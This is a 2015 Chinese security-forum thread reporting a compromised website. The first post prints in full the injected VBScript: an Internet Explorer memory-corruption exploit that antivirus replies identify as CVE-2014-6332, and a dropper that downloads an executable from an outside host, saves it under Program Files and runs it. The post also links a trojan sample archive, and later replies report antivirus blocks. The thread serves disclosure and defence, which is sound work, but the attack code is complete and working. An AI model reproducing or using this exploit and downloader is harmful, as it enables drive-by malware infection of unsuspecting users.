http://www.sdjuqian.cn/

显示全部楼层 · 发表于 2015-5-10 01:02:18

挂马网站：hxxp://www.sdjuqian.cn/

挂马代码：
[mw_shl_code=html,true]<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://lwwbx.net/member/tmp/web2015x.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\Progra~1\31088.exe",2
wscript.sleep 1000
Shell.Run ("C:\Progra~1\31088.exe") '
end function</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0) then
   exit function
  end if
  if (instr(info,"MSIE")>0) then
         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
   exit function
  end if
  win9x=0
  BeginInit()
  If Create()=True Then
   myarray=       chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
   myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
   if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
   else
      setnotsafemode()
   end if
  end if
end function
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
If Over()=True Then
   Create=True
   Exit For
End If
  Next
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
   if(intVersion<4) then
         mem=cint(a0+1)*16
         j=vartype(aa(a1-1))
         if((j=mem+4) or (j*8=mem+8)) then
            if(vartype(aa(a1-1))<>0)  Then
               If(IsObject(aa(a1)) = False ) Then
               type1=VarType(aa(a1))
               end if
            end if
         else
         redim  Preserve aa(a0)
         exit  function
         end if
      else
         if(vartype(aa(a1-1))<>0)  Then
            If(IsObject(aa(a1)) = False ) Then
               type1=VarType(aa(a1))
            end if
         end if
      end if
end if
If(type1=&h2f66) Then
      Over=True
End If
If(type1=&hB9AD) Then
      Over=True
      win9x=1
End If
redim  Preserve aa(a0)
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
   i=testaa
   i=null
   redim  Preserve aa(a2)
   ab(0)=0
   aa(a1)=i
   ab(0)=6.36598737437801E-314
   aa(a1+2)=myarray
   ab(2)=1.74088534731324E-310
   mydata=aa(a1)
   redim  Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
      j=readmemo(i+&h120+k)
      if(j=14) then
         j=0
         redim  Preserve aa(a2)
         aa(a1+2)(i+&h11c+k)=ab(4)
         redim  Preserve aa(a0)
         j=0
         j=readmemo(i+&h120+k)
         Exit for
      end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function ReadMemo(add)
On Error Resume Next
redim  Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim  Preserve aa(a0)
end function</script>[/mw_shl_code]

木马样本：

web2015x.part1.rar (500 KB, 下载次数: 84)

显示全部楼层 · 发表于 2015-5-10 08:00:23

蛋挞打开链接时拦截
Virus: Exploit.CVE-2014-6332.Gen (2x) (Engine A)

Virus found while downloading content from the web.

Address: http://www.sdjuqian.cn/
Status: Access denied.

显示全部楼层 · 发表于 2015-5-10 09:29:17

显示全部楼层 · 发表于 2015-5-10 11:32:34

火绒拦截~

[已鉴定] http://www.sdjuqian.cn/

浏览过的版块